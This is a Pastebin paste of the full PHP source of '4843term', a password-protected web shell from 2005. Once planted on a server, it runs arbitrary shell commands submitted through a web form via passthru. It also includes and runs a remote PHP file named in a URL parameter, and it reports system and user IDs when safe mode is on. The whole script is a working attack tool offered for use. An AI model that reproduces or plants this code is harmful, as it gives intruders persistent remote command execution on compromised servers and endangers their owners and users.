Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $md5pass = "946cf47f56ba86bf80208715f3aa1921";
- $password = $_POST["password"];
- $command = $_POST["command"];
- $changedir = $_POST["changedir"];
- $remotephp = $_GET["remotephp"];
- if (empty($password)) $password = $_GET["password"];
- if (!empty($password)) { if (md5($password) != $md5pass) $password = ""; }
- else $password = "";
- if (!isset($changedir) || empty($password)) {
- @ $changedir = exec("pwd");
- } else {
- @ chdir("$changedir");
- @ $changedir = exec("pwd");
- if (empty($changedir)) { $changedir = "/"; }
- }
- if (!empty($command) && !empty($password)) {
- $command = stripslashes($command);
- $temp = explode(" ", $command);
- if ($temp[0] == "cd") {
- $temp = explode(";", $command);
- $changedir = exec("$temp[0]; pwd");
- if (empty($changedir)) { $changedir = "/"; }
- $command = "";
- if (isset($temp[1])) {
- $command = $temp[1];
- for ($loop = 2; isset($temp[$loop]); $loop++) { $command .= "; $temp[$loop]"; }
- }
- }
- }
- ?>
- <html>
- <head>
- <title>4843term</title>
- </head>
- <body bcolor="#FFFFFF" text="#000000">
- <font face="Fixedsys">
- <table width="100%" border="0" cellpadding="0" cellspacing="0">
- <tr>
- <td align="left" valign="top">
- <form method="post" name="terminal" action="<?php echo $PHP_SELF; ?>" target="_self">
- <?php if (empty($password)) { echo " Password:<br>\n"; } ?>
- <input type="<?php if (!empty($password)) { echo "hidden"; } else { echo "password"; } ?>" name="password" size="50"<?php if (!empty($password)) echo " value=\"$password\""; ?>><?php if (empty($password)) { echo "<br><br>\n"; } ?>
- Directory:<br>
- <input type="text" name="changedir" size="50"<?php if (isset($changedir)) echo " value=\"$changedir\""; ?>><br><br>
- Command:<br>
- <input type="text" name="command" size="50">
- <input type="submit" value="Execute"><br>
- <input type="checkbox" name="stderr"<?php if (isset($stderr) || !isset($command)) echo " checked"; ?>> Enable stderr-trappin
- </form>
- </td>
- <td align="left" valign="center">
- <pre>
- 4843term by Havenard
- Version 1.050501 [01/May/2005]
- Contact : havenard@hotmail.com
- IRC : irc.brasnet.org
- 01010000 01001110 01010111
- </pre>
- </td>
- </tr>
- </table>
- <br>
- <pre>
- <?php
- if (md5($password) == $md5pass) {
- @ chdir("$changedir");
- $safe_mode = (bool)ini_get("safe_mode");
- if (!$safe_mode) {
- if (!empty($command)) {
- ob_start();
- if (!isset($OS) || ($OS != "Windows_NT"))
- @passthru("$command 2>&1");
- else
- @passthru("$command");
- $output = ob_get_contents();
- ob_end_clean();
- if (!empty($output))
- echo str_replace(">", ">", str_replace("<", "<", $output));
- }
- }
- else {
- echo "Due to SafeMode, it's unable to execute commands!\n";
- echo "Machine informations:\n";
- echo "PHP: ".phpversion()."\n";
- echo "Server: $SERVER_SOFTWARE $SERVER_VERSION\n";
- $uname = @posix_uname();
- if (!empty($uname)) {
- while (list($info, $value) = each($uname))
- echo "$value ";
- echo "\n";
- }
- $uids = @posix_getlogin();
- $euids = @posix_getlogin();
- $uid = @posix_getuid();
- $euid = @posix_geteuid();
- $gid = @posix_getgid();
- if (!empty($uid))
- echo "User: uid=$uids($uid) euid=$euid($euid) gid=$gid($gid)\n";
- }
- if (!empty($remotephp)) include($remotephp);
- }
- ?>
- </pre>
- <script> document.terminal.command.focus(); </script>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement